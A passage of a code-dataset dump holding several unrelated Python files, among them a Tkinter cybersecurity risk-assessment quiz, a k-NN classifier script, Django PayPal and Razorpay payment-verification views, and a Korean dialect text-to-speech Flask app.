question10=Label(window,text='Where do you devote the least amount of security?',font=('Arial',30), bg='light blue')\r\n question10.place(x=350,y=100)\r\n\r\n def trojanF():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def sqliF():\r\n \r\n global sqli\r\n sqli +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def wormF():\r\n \r\n global worm\r\n worm +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def ransomwareF():\r\n \r\n global ransomware\r\n ransomware +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def final():\r\n if worm > sqli and worm > trojan and worm > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a worm attack',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='When suffering from a worm it can result in massive losses due to it’s highly infectious spreading\\n methods. Preventing worms can be helped through limiting the reliance on the internet. Worms can \\neasily spread through connections, the internet being no different as such limit website access and \\n email downloads. Additionally keeping your system spread across various servers with few \\nconnections can help slow the spread of a worm. In the event of a worm attack limit employee \\nconnectivity to one another on the system as more employees means more targets and damages.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif sqli > worm and sqli > trojan and sqli > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a sql injection',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='The best way to avoid an SQL Injection is sanitisation of code. Implementing secure methods such as \\nwhite lists, character escaping, parametered statements and utilising firewalls can help mitigate the \\nthreat. Don’t leave database errors on the front end as it offers an “in” for attackers',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif trojan > sqli and trojan > worm and trojan > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are risk of a Trojan attack.',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='Trojans establish a backdoor for hackers to enter your system. Prevention begins with caution, don’t \\ninstall any software from emails without confirming the sender is not malicious. If in a larger \\ncompany you may need to implement restrictions on various websites and sources. As it is with \\nmany cases of security keeping up to date and utilising an Anti-virus can vastly improve protection \\nfrom a Trojan attack. 
If in the event these preventative measures are not enough you may need to \\nrely on backups to restore systems to a safe state, as such regular backups are necessary.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif ransomware > worm and ransomware > trojan and ransomware > sqli:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a ransomware attack.',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='Ransomware can be costly so prevention is very important. The best method to avoid ransomware is \\nto not click unsolicited links. Ensure you are up to date in both software and hardware terms.\\n Tracking background tasks can ensure you know what is running on your system \\nand can help you understand if your in the process of being compromised. Backups are entirely \\nnecessary to counter Ransomware, though the backup must be kept on another device from yours. \\nBackups can completely bypass the threat ransomware can pose.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n else:\r\n label_P=Label(window,text='An Error Occured.',font=('Arial',15), bg='light blue')\r\n label_P.place(x=590,y=250)\r\n\r\n\r\n def end():\r\n window.destroy()\r\n\r\n endButton=Button(window,height=1,width=10,text='Close',font=('Arial',30),command=end)\r\n endButton.place(x=500,y=390)\r\n\r\n quesNumb10.destroy()\r\n question10.destroy()\r\n choice101.destroy()\r\n choice102.destroy()\r\n choice103.destroy()\r\n choice104.destroy()\r\n\r\n choice101=Button(window,height=1,width=10,text='Passwords',font=('Arial',30),command=ransomwareF)\r\n choice101.place(x=400,y=200)\r\n choice102=Button(window,height=1,width=10,text='Whitelisting',font=('Arial',30),command=sqliF)\r\n choice102.place(x=800,y=200)\r\n choice103=Button(window,height=1,width=10,text='Emails',font=('Arial',30),command=wormF)\r\n choice103.place(x=400,y=300)\r\n choice104=Button(window,height=1,width=10,text='Downloads',font=('Arial',30),command=trojanF)\r\n choice104.place(x=800,y=300)\r\n\r\n quesNumb9.destroy()\r\n question9.destroy()\r\n choice91.destroy()\r\n choice92.destroy()\r\n\r\n choice91=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=trojan10)\r\n choice91.place(x=400,y=200)\r\n choice92=Button(window,height=1,width=10,text='No',font=('Arial',30),command=questions10)\r\n choice92.place(x=800,y=200)\r\n\r\n quesNumb8.destroy()\r\n question8.destroy()\r\n choice81.destroy()\r\n choice82.destroy()\r\n\r\n choice81=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions9)\r\n choice81.place(x=400,y=200)\r\n choice82=Button(window,height=1,width=10,text='No',font=('Arial',30),command=worm9)\r\n choice82.place(x=800,y=200)\r\n\r\n quesNumb7.destroy()\r\n question7.destroy()\r\n choice71.destroy()\r\n choice72.destroy()\r\n choice73.destroy()\r\n\r\n choice71=Button(window,height=1,width=10,text='Frequently',font=('Arial',30),command=questions8)\r\n choice71.place(x=400,y=200)\r\n choice72=Button(window,height=1,width=10,text='Infrequently',font=('Arial',30),command=trojan8)\r\n choice72.place(x=800,y=200)\r\n choice73=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=sqli8)\r\n choice73.place(x=600,y=300)\r\n\r\n\r\n quesNumb6.destroy()\r\n question6.destroy()\r\n choice61.destroy()\r\n choice62.destroy()\r\n choice63.destroy()\r\n\r\n 
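# ---------------------------------------------------------------
# Aside: final() above ranks the four global counters with a chain of
# strict > comparisons, so any tie falls through to the error branch. A
# sketch with collections.Counter makes the ranking explicit and
# tie-tolerant:
#
#     from collections import Counter
#     scores = Counter(worm=worm, ransomware=ransomware,
#                      sqli=sqli, trojan=trojan)
#     (top_threat, top_score), = scores.most_common(1)
#     ties = [k for k, v in scores.items() if v == top_score]
# ---------------------------------------------------------------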
choice61=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions7)\r\n choice61.place(x=400,y=200)\r\n choice62=Button(window,height=1,width=10,text='No',font=('Arial',30), command=worm7)\r\n choice62.place(x=800,y=200)\r\n choice63=Button(window,height=1,width=10,text='Somewhat',font=('Arial',30),command=sqli7)\r\n choice63.place(x=600,y=300)\r\n\r\n quesNumb5.destroy()\r\n question5.destroy()\r\n choice51.destroy()\r\n choice52.destroy()\r\n choice53.destroy()\r\n\r\n choice51=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions6)\r\n choice51.place(x=400,y=200)\r\n choice52=Button(window,height=1,width=10,text='Some',font=('Arial',30),command=sqli6)\r\n choice52.place(x=600,y=300)\r\n choice53=Button(window,height=1,width=10,text='No',font=('Arial',30),command=ransomware6)\r\n choice53.place(x=800,y=200)\r\n\r\n quesNumb4.destroy()\r\n question4.destroy()\r\n choice41.destroy()\r\n choice42.destroy()\r\n\r\n\r\n choice41=Button(window,height=1,width=10,text='<100,000',font=('Arial',30),command= ransomware5)\r\n choice41.place(x=400,y=200)\r\n choice42=Button(window,height=1,width=10,text='>100,000',font=('Arial',30),command= sqli5)\r\n choice42.place(x=800,y=200)\r\n\r\n quesNumb3.destroy()\r\n question3.destroy()\r\n choice31.destroy()\r\n choice32.destroy()\r\n choice33.destroy()\r\n choice34.destroy()\r\n\r\n\r\n choice31=Button(window,height=1,width=10,text='monthly',font=('Arial',30),command=questions4)\r\n choice31.place(x=400,y=200)\r\n choice32=Button(window,height=1,width=10,text='<6months',font=('Arial',30),command=worm4)\r\n choice32.place(x=800,y=200)\r\n choice34=Button(window,height=1,width=10,text='>6 months',font=('Arial',30),command=worm4)\r\n choice34.place(x=800,y=300)\r\n choice33=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=worm4)\r\n choice33.place(x=400,y=300)\r\n\r\n quesNumb2.destroy()\r\n question2.destroy()\r\n choice21.destroy()\r\n choice22.destroy()\r\n choice23.destroy()\r\n choice24.destroy()\r\n\r\n choice21=Button(window,height=1,width=10,text='Daily',font=('Arial',30),command=questions3)\r\n choice21.place(x=400,y=200)\r\n choice22=Button(window,height=1,width=10,text='Weekly',font=('Arial',30),command=trojan3)\r\n choice22.place(x=800,y=200)\r\n choice23=Button(window,height=1,width=10,text='Monthly',font=('Arial',30),command=ransomware3)\r\n choice23.place(x=400,y=300)\r\n choice24=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=ransomware3)\r\n choice24.place(x=800,y=300)\r\n\r\n quesNumb1.destroy()\r\n question1.destroy()\r\n choice1.destroy()\r\n choice2.destroy()\r\n choice3.destroy()\r\n choice4.destroy()\r\n\r\n choice1=Button(window,height=1,width=10,text='1000+',font=('Arial',30),command=ransomware2)\r\n choice1.place(x=400,y=200)\r\n choice2=Button(window,height=1,width=10,text='500-1000',font=('Arial',30),command=worm2)\r\n choice2.place(x=800,y=200)\r\n choice3=Button(window,height=1,width=10,text='250-500',font=('Arial',30),command=worm2)\r\n choice3.place(x=400,y=300)\r\n choice4=Button(window,height=1,width=10,text='0-250',font=('Arial',30),command=worm2)\r\n choice4.place(x=800,y=300)\r\n title.destroy()\r\n labelComp.destroy()\r\n nameEntered.destroy()\r\n 
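# ---------------------------------------------------------------
# Aside: the per-button helpers (worm2, ransomware2, trojan3, ...) each
# just bump one counter and advance to the next screen. A sketch of a
# single parameterised handler instead (names illustrative, not from the
# file):
#
#     counters = {"worm": 0, "ransomware": 0, "sqli": 0, "trojan": 0}
#
#     def answer(tag, next_screen):
#         if tag is not None:
#             counters[tag] += 1
#         next_screen()
#
#     Button(window, text='1000+', font=('Arial', 30),
#            command=lambda: answer('ransomware', questions2))
# ---------------------------------------------------------------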
button1.destroy()\r\n\r\nbutton1=Button(window,height=1,width=10,text='Submit',font=('Arial',30),command=questions1)\r\nbutton1.place(x=600,y=350)\r\n\r\nwindow.mainloop()\r\n","repo_name":"Lane-Eimhin/Risk-Assessment-Tool","sub_path":"RiskAssessmentTool.py","file_name":"RiskAssessmentTool.py","file_ext":"py","file_size_in_byte":22932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13192048316","text":"import random\nimport time\nfrom threading import Thread, Lock\nimport logging\nimport numpy\n\nfrom constants import tick_time, seed\nfrom google_ads import GoogleAds\nfrom market import Market\nfrom twitter import Twitter\n\nrandom.seed(seed)\n\n\nclass Customer(object):\n    def __init__(self, name, wallet, tolerance=0.5):\n        self.name, self.wallet, self.tolerance = name, wallet, tolerance\n        logging.info(\"[Customer]:Customer %s Created\",self.name)\n        # Register the user with google ads\n        GoogleAds.register_user(self)\n\n        # ad space stores all the adverts consumed by this user\n        self.ad_space = set()\n        # stores all the bought products\n        self.owned_products = set()\n\n        # flag to stop thread\n        self.STOP = False\n\n        # regulate synchronisation\n        self.lock = Lock()\n        self.tickcount=0\n        # start this user in separate thread\n        self.thread = Thread(name=name, target=self.loop)\n        self.thread.start()\n\n    # View the advert to this consumer. The advert is appended to the ad_space\n    def view_advert(self, product):\n        self.lock.acquire()\n        self.ad_space.add(product)\n        self.lock.release()\n\n    # Consumer decided to buy a 'product'.\n    def buy(self, product):\n        # if not enough money in wallet, don't proceed\n        if self.wallet < product.price:\n            return\n\n        # purchase the product from market\n        Market.buy(self, product)\n\n        # add product to the owned products list\n        self.owned_products.add(product)\n\n    # money is deducted from user's wallet when purchase is completed\n    def deduct(self, money):\n        self.wallet -= money\n\n    # User expresses his sentiment about the product on twitter\n    def tweet(self, product, sentiment):\n        Twitter.post(self, product, sentiment)\n\n    # Loop function to keep the simulation going\n    def loop(self):\n        logging.info(\"[Customer]:Customer %s entered Trading\",self.name)\n        while not self.STOP:\n            self.tickcount+=1 \n            logging.info(\"[Customer]:(%s,%d): Next Quarter Begins \",self.name,self.tickcount)\n            self.tick()\n            #Customer.next_q=Customer.next_q+1\n            time.sleep(tick_time)\n        test=', '.join(x.name for x in self.owned_products)\n        logging.info(\"[Customer]: (%s,%d) own the Products:[%s] with balance of $ %d\",self.name,self.tickcount,test,self.wallet)\n        logging.info(\"[Customer]: (%s,%d) Exit\", self.name,self.tickcount)\n\n    # one timestep in the simulation world\n    def tick(self):\n        test=', '.join(x.name for x in self.ad_space)\n        logging.info(\"[Customer]:(%s,%d) currently seeing ads for the Products:[%s]\",self.name,self.tickcount,test)\n        self.lock.acquire()\n        # user looks at all the adverts in his ad_space\n        for product in self.ad_space:\n            # user checks the reviews about the product on twitter\n            #print(\"Products\",product.name)\n            tweets = numpy.asarray(Twitter.get_latest_tweets(product.name, 100))\n            #print(\"[\", self.name,\"]:Products\",product.name,\"Tweets=\",tweets)\n            if len(tweets) == 0:\n                user_sentiment = 1 \n            else:\n                user_sentiment = (tweets == 'POSITIVE').mean()\n\n            # ANSWER d.\n            # if sentiment meets the user's tolerance and the user does not own the product, they may buy it with 10% chance (random.random() < 0.1). If they already own the product, the chance of buying again is 1%\n            if user_sentiment >= self.tolerance:\n                if(product not in self.owned_products and random.random() < 0.1):\n                    logging.info(\"[Customer]:***(%s,%d)bought the new product:[%s]\",self.name,self.tickcount,product.name)\n                    self.buy(product)\n                elif (product in self.owned_products and random.random() < 0.01):\n                    logging.info(\"[Customer]:$$$(%s,%d)bought the same product again:[%s]\",self.name,self.tickcount,product.name)\n                    self.buy(product)\n                else:\n                    logging.info(\"[Customer]:###(%s,%d)doesn't buy any products \",self.name,self.tickcount)\n        # remove the adverts from ad_space\n        self.ad_space = set()\n        test=', '.join(x.name for x in self.ad_space)\n        logging.info(\"[Customer]:(%s,%d) Ad Space cleared \",self.name,self.tickcount)\n        # with some chance, the user may tweet about the product\n        if random.random() < 0.5 and len(self.owned_products) > 0:\n            # he may choose any random product\n            product = random.choice(list(self.owned_products))\n            # sentiment is positive if the quality is higher than the tolerance\n            if self.tolerance < product.quality:\n                sentiment = 'POSITIVE' \n            else:\n                sentiment='NEGATIVE'\n            # tweet sent\n            self.tweet(product, sentiment)\n            logging.info(\"[Customer]:(%s,%d) Posted %s tweet for the product %s\",self.name,self.tickcount,sentiment,product.name)\n        self.lock.release()\n\n    # set the flag to True and wait for thread to join\n    def kill(self):\n        self.STOP = True\n        self.thread.join(timeout=0)\n\n    def __str__(self):\n        return self.name\n    \n    def log_roundstatus(self):\n        pass\n","repo_name":"CentIIO/IS5006","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43438123080","text":"'''\nknn.py accepts path of the dataset, k-NN hyperparameters through command line argument,\nloads and preprocesses images in the dataset, encodes label, fits a k-NN model on the dataset,\nand evaluates the classifier performance\n\nusage: python knn.py [-h] -d DATASET [-k NEIGHBORS] [-j JOBS] \n'''\n\n# import the required package\n# KNeighborsClassifier contains the implementation of the k-NN algorithm\n# LabelEncoder converts labels represented as strings to integers \n# train_test_split creates the training and testing split\n# classification_report helps evaluate the classifier performance through a table\n# paths - grabs the file path to all images in the dataset\n# argparse - accepting command line arguments\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom pyimagesearch.preprocessing.simplepreprocessor import SimplePreprocessor\nfrom pyimagesearch.datasets.simpledatasetloader import SimpleDatasetLoader\nfrom imutils import paths\nimport argparse\n\n# construct the argument parse and parse the arguments\n# --jobs - optional, the number of concurrent jobs to run when computing the distance between\n# an input data point and the training set\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required = True, help = \"Path to input dataset\")\nap.add_argument(\"-k\", \"--neighbors\", type = int, default = 1, help = \"# of nearest neighbors for classification\")\nap.add_argument(\"-j\", \"--jobs\", type = int, default = -1, help = \"# of concurrent jobs for the k-NN distance computation (-1 uses all available cores)\")\nargs = vars(ap.parse_args())
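# A typical invocation of the script above, assuming the dataset is laid out
# as dataset/{class_name}/{image}.jpg (the path below is illustrative):
#
#   python knn.py --dataset ./datasets/animals -k 3 -j -1
#
# This loads every image, resizes it to 32x32, flattens it into a 3072-d raw
# pixel vector, and fits a 3-nearest-neighbour classifier using all CPU cores
# for the distance computations.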
\n\n# grab the file path of images in our dataset\nprint(\"[INFO] Loading images...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\n\n# initialize the image preprocessor, load the dataset from disk,\n# and reshape the data matrix\n\nsp = SimplePreprocessor(32, 32)\n\n# supplying instantiated SimplePreprocessor in a list as an argument, \n# implying that sp will be applied to every image in the dataset\nsdl = SimpleDatasetLoader(preprocessors = [sp])\n# load() returns a tuple containing input images and their corresponding labels\n(data, labels) = sdl.load(imagePaths, verbose = 500)\n\n# flatten the image: 32 x 32 x 3 = 3072\n# new shape: [3000, 3072]\ndata = data.reshape((data.shape[0], 3072))\n\n# show some information on memory consumption of the images\n# compute the number of bytes the array consumes and convert it to MB\nprint(\"[INFO] Features matrix: {:.1f} MB\".format(data.nbytes / (1024 * 1000.0)))\n\n# encode the labels as integers; one unique integer per class\nle = LabelEncoder()\nlabels = le.fit_transform(labels)\n\n# partition the data into training and testing splits using 75% of\n# the data for training and the remaining 25% for testing\n\ntrainX, testX, trainY, testY = train_test_split(data, labels, test_size = 0.25, random_state = 42)\n\n# train and evaluate a k-NN classifier on the raw pixel intensities\nprint(\"[INFO] Evaluating k-NN classifier...\")\nmodel = KNeighborsClassifier(n_neighbors = args[\"neighbors\"], n_jobs = args[\"jobs\"])\nmodel.fit(trainX, trainY)\n# classification_report returns a table containing evaluation metrics\n# target_names - optional, names of the class labels\nprint(classification_report(testY, model.predict(testX), target_names = le.classes_))\n\n","repo_name":"KshitizS26/computer-vision-deep-learning","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1333347318","text":"from decouple import config\nimport json\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom order.models import Order\nfrom product.models import Product\nfrom order.models import ProductOrderList\n\n\nimport paypalrestsdk\nimport razorpay\n\n\n# Create your views here.\n\ndef reduce_from_stock(saved_order_instance):\n    try:\n\n        # reduce products from stock\n\n        product_list_instances = ProductOrderList.objects.filter(\n            order_details=saved_order_instance.id)\n        for product in product_list_instances:\n            product_instance = Product.objects.get(id=product.product.id)\n            product_instance.stock -= product.quantity\n            product_instance.save()\n\n        return True\n    except Exception:\n        return False\n\n\npaypalrestsdk.configure({\n    \"mode\": \"sandbox\",  # sandbox or live\n    \"client_id\": config('PAYPAL_CLIENT_ID'),\n    \"client_secret\": config('PAYPAL_SECRET_ID')})\n\n\nclass PaypalExecute(generics.GenericAPIView):\n    permission_classes = (IsAuthenticated,)\n    authentication_classes = (TokenAuthentication,)\n\n    def get(self, request, *args, **kwargs):\n        pay_id = request.GET.get('paymentId', '')\n        payer_id = request.GET.get('PayerID', '')\n\n        payment = paypalrestsdk.Payment.find(pay_id)\n\n        order_id = int(payment['transactions'][0]['custom'])\n        order_instance = Order.objects.get(id=order_id)\n\n
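# Note: the amount check just below compares money as floats, which is
# vulnerable to representation error. A sketch of an exact comparison with
# Decimal (the helper name is illustrative, not part of the original view):
from decimal import Decimal

def amounts_match(order_total, gateway_total) -> bool:
    """Compare two monetary amounts exactly, rounded to two decimal places."""
    def to_cents(value):
        return Decimal(str(value)).quantize(Decimal("0.01"))
    return to_cents(order_total) == to_cents(gateway_total)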
        if float(order_instance.total_amt) == float(payment['transactions'][0]['amount']['total']):\n            if payment.execute({\"payer_id\": payer_id}):\n                print(\"Payment executed successfully\")\n                order_instance.paid = True\n                order_instance.save()\n                return Response({'response': \"Payment executed successfully\"}, status=status.HTTP_200_OK)\n            else:\n                print(payment.error)  # Error Hash\n\n        return Response({'error': \"Invalid payment! Amount does not match.\"}, status=status.HTTP_409_CONFLICT)\n\n\nclass RazorpayVerification(generics.GenericAPIView):\n\n    permission_classes = (IsAuthenticated,)\n    authentication_classes = (TokenAuthentication,)\n\n    def post(self, request, *args, **kwargs):\n        payload = json.loads(request.body)\n        saved_order_instance = Order.objects.get(id=payload['order_id'])\n        if request.user != saved_order_instance.user:\n            return Response({\"error\": \"Invalid user\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n        # generating and comparing the payment signature\n\n        client = razorpay.Client(\n            auth=(config(\"RAZORPAY_KEY_ID\"), config(\"RAZORPAY_SECRET_ID\")))\n\n        params_dict = {\n            'razorpay_order_id': saved_order_instance.generated_id,\n            'razorpay_payment_id': payload['razorpay_payment_id'],\n            'razorpay_signature': payload['razorpay_signature']\n        }\n        # verify_payment_signature() returns a falsy value on success and raises\n        # razorpay.errors.SignatureVerificationError when the signature is invalid,\n        # so truthiness alone cannot distinguish success from failure\n        try:\n            client.utility.verify_payment_signature(params_dict)\n        except razorpay.errors.SignatureVerificationError:\n            return Response({\"error\": \"Invalid Payment Signature. Verification Failed\"}, status=status.HTTP_402_PAYMENT_REQUIRED)\n\n        # change paid status here\n        saved_order_instance.paid = True\n        saved_order_instance.save()\n        if reduce_from_stock(saved_order_instance):\n            return Response({\"response\": \"Successfully verified\"}, status=status.HTTP_200_OK)\n","repo_name":"MoonC432/basic-ecom","sub_path":"backend/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38672890392","text":"class Solution(object):\n    def maxScore(self, cardPoints, k):\n        \"\"\"\n        :type cardPoints: List[int]\n        :type k: int\n        :rtype: int\n        \"\"\"\n#         res=[]\n#         l=0\n#         sumMax=max(sum(cardPoints[:k]),sum(cardPoints[-k:]))\n#         r=len(cardPoints)\n#         def sumiscore(cardPoints,k,sumi,l,r):\n#             if k==0 or l>=r or sumi>=sumMax:\n#                 res.append(sumi)\n#                 return \n#             sumiscore(cardPoints[1:],k-1,sumi+cardPoints[0],l+1,r) \n#             sumiscore(cardPoints[:-1],k-1,sumi+cardPoints[-1],l,r-1) \n        \n#         sumiscore(cardPoints,k,0,l,r)\n#         return max(res)\n\n        \n        i=0\n        sumTotal=sum(cardPoints)\n        res=sumTotal\n        n=len(cardPoints)\n        sumi = sum(cardPoints[:n-k])\n        for i in range(len(cardPoints)-(n-k)+1):\n            if sumi < res:\n                res = sumi\n            # slide the fixed-size window of unchosen cards one step right\n            if i + n - k < n:\n                sumi += cardPoints[i + n - k] - cardPoints[i]\n        # max score = total minus the minimum (n-k)-card contiguous window\n        return sumTotal - res\n\nnome = input('What is your name? ')  # (reconstructed prompt; the original line was lost)\nprint('{:>20}'.format(nome))\n# :>20 right-aligns the name in a 20-character field. You can align left with :<20, center with :^20, or center padded with '=' signs using :=^20\n# to keep a float to 3 decimal places, use :.3f\n# if you don't want print to break the line, pass end=''\n\nn1 = int(input('Enter a value'))\nn2 = int(input('Enter another value'))\ns=n1+n2\nm=n1*n2\nd=n1/n2\ndi=n1//n2\ne=n1**n2\nprint('The sum is {}, the product is {} and the division is {:.3f}'.format(s,m,d), end='')\nprint(' Integer division {} and power {}'.format(di,e))","repo_name":"emersontop/python3","sub_path":"aulas/aula007.py","file_name":"aula007.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70177079092","text":"# -*- coding: cp949 -*-\nimport json\nimport sys\nimport time\nfrom docutils.nodes import header\nfrom numpy import finfo\nimport pandas as pd\nfrom source.distributed import apply_gradient_allreduce\nfrom speech_synthesis import Text2Speech\nfrom source.db.app import TTS\nsys.path.append('source/waveglow/')\nimport numpy as np\nfrom scipy.io import wavfile\nfrom flask import Flask, render_template, request\nfrom source.hparams import create_hparams\nhparams=create_hparams()\nfrom source.model import Tacotron2\nfrom translation import Korean2Dialect\n\n\ndef save_wav(wav, path, sr):\n    wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n    # proposed by @dsmiller\n    wav = wav.astype(np.int16)\n    wavfile.write(path, sr, wav)\n    return wav\n\n\ndef uri_mapping(speaker: str, model_type: str, attitude_style: str) -> str:\n    uri = 'source/outdir'\n    if speaker.strip() == '남성':\n        uri += '/male'\n    elif speaker.strip() == '여성':\n        uri += '/female'\n    else:\n        print('speaker {}'.format(speaker))\n        print('uri {}'.format(uri))\n        raise NotImplementedError(\"speaker is not implemented\")\n\n    if model_type.strip() == '표준어':\n        uri += '/standard'\n    elif model_type.strip() == '제주도':\n        uri += '/jeju'\n    elif model_type.strip() == '대구':\n        uri += '/daegu'\n    elif model_type.strip() == '경상북도':\n        uri += '/gyeonsangbuk'\n    elif model_type.strip() == '부산':\n        uri += '/busan'\n    else:\n        print('uri {}'.format(uri))\n        print('model_type {}'.format(model_type))\n        raise NotImplementedError(\"model type is not implemented\")\n\n    return uri\n
\ndef clean_text(txt:str)->list:\n    ### transform english char to korean text\n    transform_dict = {'a':'에이','b':'비','c':'시','d':'디','e':'이','f':'에프','g':'지','h':'에이치','i':'아이','j':'제이','k':'케이','l':'엘','m':'엠',\n                      'n':'엔','o':'오','p':'피', 'q':'큐','r':'아르','s':'에스','t':'티','u':'유','v':'브이','w':'더블유','x':'엑스','y':'와이','z':'제트',\n                      u\"'\":u'\"', '(':', ', ')':', ', '#':'샵', '%':'프로', '@':'고팽이', '+':'더하기', '-':'빼기', ':':'나누기', '*':'별'}\n    ### remove not allowed chars\n    not_allowed_characters = list('^~')\n    txt = ''.join(i for i in txt if not i in not_allowed_characters)\n    txt = txt.lower().strip()\n    ### transform special char to hangul\n    for k,v in transform_dict.items():\n        txt=txt.replace(k, v).replace(' .', '.').replace(' ?', '?').strip()\n    from koalanlp import API\n    from koalanlp.proc import SentenceSplitter\n    from koalanlp.Util import initialize, finalize\n    #### split paragraph to list of sentences\n    initialize(hnn=\"2.1.3\")\n    splitter = SentenceSplitter(api=API.HNN)\n    paragraph = splitter(txt)\n    finalize()\n    # return paragraph\n    txt_list=[]\n    import string\n    max_len=60\n    for s in paragraph:\n        txt_ = s.translate(str.maketrans('', '', string.punctuation.replace(',','')))\n        txt_=txt_.strip()\n\n        while True:\n            if ',,' in txt_:\n                txt_=txt_.replace(',,',',')\n            else:\n                break\n\n        if len(txt_.replace(',','').replace(' ','').strip())>0:\n            txt_ = txt_.replace(' ,', ',').replace(',', ', ')\n            if len(txt_) >= max_len:\n                start = 0\n                while True:\n                    if start>=len(txt_):\n                        break\n                    else:\n                        sub_txt = txt_[start:start+max_len]\n                        start += max_len\n                        if not (sub_txt.endswith('.') or sub_txt.endswith('?') or sub_txt.endswith('!')):\n                            sub_txt = sub_txt + '.'\n                        txt_list.append(sub_txt.strip())\n            else:\n                if not (txt_.endswith('.') or txt_.endswith('?') or txt_.endswith('!')):\n                    txt_ = txt_ + '.'\n                txt_list.append(txt_.strip())\n    return txt_list\n\ndef load_model(hparams):\n    model = Tacotron2(hparams).cuda()\n    if hparams.fp16_run:\n        model.decoder.attention_layer.score_mask_value = finfo('float16').min\n    if hparams.distributed_run:\n        model = apply_gradient_allreduce(model)\n    return model\n\n\n## =============================== load pretrained model =======================================\n### tacotron\n# =============================== define web app =======================================\napp = Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI']= DB_URL\n# db = SQLAlchemy(app)\n\njeju_translation = Korean2Dialect('jeju', beam_search=False, k=0)  # instantiate the Jeju translation class\ngyeong_translation = Korean2Dialect('gyeong', beam_search=False, k=0)  # instantiate the Gyeongsang translation class\njeon_translation = Korean2Dialect('jeon', beam_search=False, k=0)  # instantiate the Jeolla translation class\n\njeju_speech = Text2Speech('제주')  # instantiate the Jeju speech-synthesis class\ngyeong_speech = Text2Speech('경상')  # instantiate the Gyeongsang speech-synthesis class\njeon_speech = Text2Speech('전라')  # instantiate the Jeolla speech-synthesis class\n\n\n@app.route('/ml-inference', methods=['POST'])\ndef ml_inference():\n    print('====== Synthesizing ======')\n    print(request.form)\n    total_time = time.time()\n    gender = str(request.form['gender-options'])  # one of ['남자', '여자'] (male / female)\n    model_type = str(request.form['model-type-options'])  # one of ['제주도', '경상도', '전라도'] (Jeju / Gyeongsang / Jeolla)\n    # decide which dialect pipeline to use\n    # ##### select model\n    if model_type == '표준':\n        ### standard\n        korean2dialect = jeju_translation\n        text2speech = jeju_speech\n    elif model_type == '제주':\n        ## with jeju voice, need translation (standard --> jeju language)\n        korean2dialect = jeju_translation\n        text2speech = jeju_speech\n    elif model_type == '경상':\n        ## Gyeongsang\n        korean2dialect = gyeong_translation\n        text2speech = gyeong_speech\n    elif model_type == '전라':\n        korean2dialect = jeon_translation\n        text2speech = jeon_speech\n    else:\n        return app.response_class(response=None, status=404, mimetype='application/json')\n\n    korean = request.form['input-text']  # standard-Korean input\n    # dialect = korean2dialect.transform(korean)  # translate\n    dialect = korean  # translation currently bypassed\n    txt_list = clean_text(txt=dialect)  # clean the (translated) text\n    wav_file, error_log = text2speech.forward(txt_list)  # text -> wav file\n    error_sentences = []\n    for k, v in error_log.items():\n        if v:\n            error_sentences.append(k)\n    error_sentences = '|'.join(error_sentences)\n    return_data = {'translated_text': dialect, 'audio_stream': wav_file}\n    res = app.response_class(response=json.dumps(return_data), status=200, mimetype='application/json')\n    ip = request.remote_addr\n    print('Total time(translation + 